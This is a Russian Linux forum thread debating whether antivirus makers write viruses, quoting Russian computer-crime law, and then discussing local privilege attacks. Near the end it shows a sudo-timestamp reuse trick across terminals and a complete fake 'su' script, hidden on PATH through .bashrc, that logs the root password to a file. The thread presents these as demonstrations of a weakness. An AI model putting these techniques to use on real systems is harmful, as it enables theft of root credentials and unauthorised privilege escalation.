Почему?

По мне так наоборот, гораздо проще написать антивирусную базу для свеженаписанного вируса тем же человеком, чем гулять по сети и выискивать неизвестные вирусы. Ну, или ждать присланные от пользователей карантины какие-нить...
Модератор: Модераторы разделов
договорится не могут.Bluetooth писал(а): ↑20.06.2009 11:27Честно говоря, производители антивирусов с другими производителями антивирусов сговориться не могут, не говоря уж о том, чтоб эффективно сговариваться с вирусописателями. Да и к тому же в этом нет смысла. Конечно, вариант с "сами пишем, сами обезвреживаем" получше будет, но тоже уж очень оторван от реальности.
drBatty писал(а): ↑20.06.2009 18:13
прецедентов не было?договорится не могут.Bluetooth писал(а): ↑20.06.2009 11:27Честно говоря, производители антивирусов с другими производителями антивирусов сговориться не могут, не говоря уж о том, чтоб эффективно сговариваться с вирусописателями. Да и к тому же в этом нет смысла. Конечно, вариант с "сами пишем, сами обезвреживаем" получше будет, но тоже уж очень оторван от реальности.
потому появляются вирусы, которые ловятся только определённым антивирусом. но ловятся! как будто, антивирусы тоже бывают совместимы с вирусами, как и остальное ПО которое идёт в комплексе. Ну к примеру gcc и ld. есть компилятор, есть линковщик к нему. ИМХО они делаются если и разными людьми, то не слишком разными.
в конце концов кто-то же вирусы пишет? я тут видел прикольный троянчек, который требует послать СМС. красивенький такой... грозился завалить всю систему(я думал - и вправду сотрёт/зашифрует, нет, обошлось. впрочем там и не было ничего ценного)
вот глядя на этот вирус, мне показалось, что автор - не студент-очкарик, которому папа вчера купил компьютер
Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.
/dev/random писал(а): ↑21.06.2009 16:50Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.
drBatty писал(а): ↑22.06.2009 11:21/dev/random писал(а): ↑21.06.2009 16:50Да какой тут заговор? Всё проще. Производители антивирусов награждают пользователей, присылающих им образцы вирусов (обычно лицензионной копией антивируса). Что станет делать мнящий себя "хакером" Вася Пупкин, если ему захочется иметь самый свежий антивирус, для которого ещё нет кряка? Правильно, напишет вирус, отошлёт куда следует, и получит лицензионный ключик. Вот и всё.
нет такой практики. кстати, "Вася Пупкин" может реально сесть на нары сроком до 6(шести) лет.
/dev/random писал(а): ↑22.06.2009 14:37
Но я лично знаю человека, которому за образец вируса (разумеется, не им написанного) выслали лицензионный ключ KAV.
Статья 183. Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну
1. Собирание сведений, составляющих коммерческую, налоговую или банковскую тайну, путем похищения документов, подкупа или угроз, а равно иным незаконным способом -
наказывается штрафом в размере до восьмидесяти тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного до шести месяцев либо лишением свободы на срок до двух лет.
2. Незаконные разглашение или использование сведений, составляющих коммерческую, налоговую или банковскую тайну, без согласия их владельца лицом, которому она была доверена или стала известна по службе или работе, -
наказываются штрафом в размере до ста двадцати тысяч рублей или в размере заработной платы или иного дохода осужденного за период до одного года с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет либо лишением свободы на срок до трех лет.
3. Те же деяния, причинившие крупный ущерб или совершенные из корыстной заинтересованности, -
наказываются штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет либо лишением свободы на срок до пяти лет.
4. Деяния, предусмотренные частями второй или третьей настоящей статьи, повлекшие тяжкие последствия, -
наказываются лишением свободы на срок до десяти лет.
Статья 272. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, -
наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.
/dev/random писал(а): ↑22.06.2009 14:37Но я лично знаю человека, которому за образец вируса (разумеется, не им написанного) выслали лицензионный ключ KAV.
Телевизор -- прибор со встроенной функцией приема телесигнала и просмотра телепередач. Но это совсем не означает, что я этим пользуюсь, даже если кабель заведен в квартиру. Основное назначение телевизора у меня -- работать монитором.
Не подразумевает. Как создание веб-сайта/веб-приложения отнюдь не подразумевает его обязательной публикации. Это может быть учебный/исследовательский проект.
Нельзя приписать и не подойдет. Эти статьи сами по себе с вирусами связаны примерно также, как хранение оружия и статьи за умышленное убийство.
watashiwa_darede... писал(а): ↑24.06.2009 07:31Не подразумевает. Как создание веб-сайта/веб-приложения отнюдь не подразумевает его обязательной публикации. Это может быть учебный/исследовательский проект.
эти - даwatashiwa_darede... писал(а): ↑24.06.2009 07:31Нельзя приписать и не подойдет. Эти статьи сами по себе с вирусами связаны примерно также, как хранение оружия и статьи за умышленное убийство.
Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ
1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами -
наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок от трех до семи лет.
Очень размытая формулировка. Есть подозрение, что некоторые слова повседневной лексики имеют какой-то особый юридический смысл. Иначе, по этой статье надо сажать всю Лабораторию Касперского в полном составе за "использование ... таких программ или машинных носителей с такими программами". Или у ЛК подразделение, непосредственно занимающееся вирусами, базируется в Уганде?
Вообще-то, по хорошему, если у меня нашли наркотики, то нужно еще доказать, что я имею к ним отношение и они не забыты предыдущим жильцом на съемной квартире или предыдущим клиентом в арендованной машине или еще чего похуже и со злым умыслом. А с вирусом, по самой его природе, такие подставы -- типовая ситуация. Если бы можно было просто за найденный вирус сажать, это уже давно было бы основным инструментом давления, ибо подавляющее большинство машин либо заражено, либо пассивно хранит вирусы (в кэше браузера, в почте, ...).
watashiwa_darede... писал(а): ↑24.06.2009 07:50всю Лабораторию Касперского в полном составе за "использование ..
закон - что дышло, куда повернёшь, туда и вышло...
ну бинарный файл который и не запустить думаю не пришьют - у меня вот есть такое в кеше, но я спокоен - у меня нет ПО, среды для работы. это мусор в моей системе, не файлы даже, обрывки.watashiwa_darede... писал(а): ↑24.06.2009 07:59ибо подавляющее большинство машин либо заражено, либо пассивно хранит вирусы (в кэше браузера, в почте, ...).
neudachnik писал(а): ↑02.08.2009 18:10Вот conky показывает запущенные процессы.А вы не знаете,сможет conky показать работу "чужой" программы,например трояна какого-нибудь ?
кроме дефолтной убунты, с её беспарольным судо
И следующие 5 минут уже не спрашивает. Достаточно повесить процесс с правами пользователя, который будет с определенным интервалом дергать sudo.
watashiwa_darede... писал(а): ↑03.08.2009 14:11И следующие 5 минут уже не спрашивает. Достаточно повесить процесс с правами пользователя, который будет с определенным интервалом дергать sudo.
user@localhost
user@localhost$ tty
/dev/pts/1
user@localhost$ sudo ls
[sudo] password for user:
test1 test2 test3
user@localhost$ sudo ls
test1 test2 test3
user@localhost
user@localhost$ tty
/dev/pts/2
user@localhost$ sudo ls
[sudo] password for user: ^C
user@localhost$ SUDO_ASKPASS=/bin/true sudo -A ls </dev/pts/1 2>&0
test1 test2 test3
Код: Выделить всё
alexey@desktop:~$ cat > /tmp/.hidden/su
#!/bin/bash
SUCCEED_FILE=/tmp/.succeed;
if [ -f "$SUCCEED_FILE" ]; then
/bin/su "$@"; else
printf "Password: ";
stty -echo;
read pass;
stty echo;
printf "\n";
sleep 3s;
printf "su: autentification failure\n";
printf "root password: \"%s\"\n" "$pass" > /tmp/.root_pass;
touch "$SUCCEED_FILE";
fi
alexey@desktop:~$ chmod a+x /tmp/.hidden/su
alexey@desktop:~$ printf "export PATH=\"/tmp/.hidden:\$PATH\"\n" >> .bashrc
alexey@desktop:~$
Код: Выделить всё
alexey@desktop:~$ su -c whoami
Password:
su: autentification failure
alexey@desktop:~$ # Ой, кажется, не ту педаль нажал. Ну-ка ещё раз...
alexey@desktop:~$ su -c whoami
Password:
root
alexey@desktop:~$ # Всё отлично.
Код: Выделить всё
alexey@desktop:~$ cat /tmp/.root_pass
root password: "Here is the password"
alexey@desktop:~$
Нет, не сработает. Времена изменились, вручную из консольки команды запускает уже меньшинство. У большинства программы сами спрашивают пароль для подтверждения перехода в привилегированный режим (aptitude, например, всякие гуёвые конфигурялки в убунте и пр.). Всякие su и sudo запускаются по полному пути в этом случае.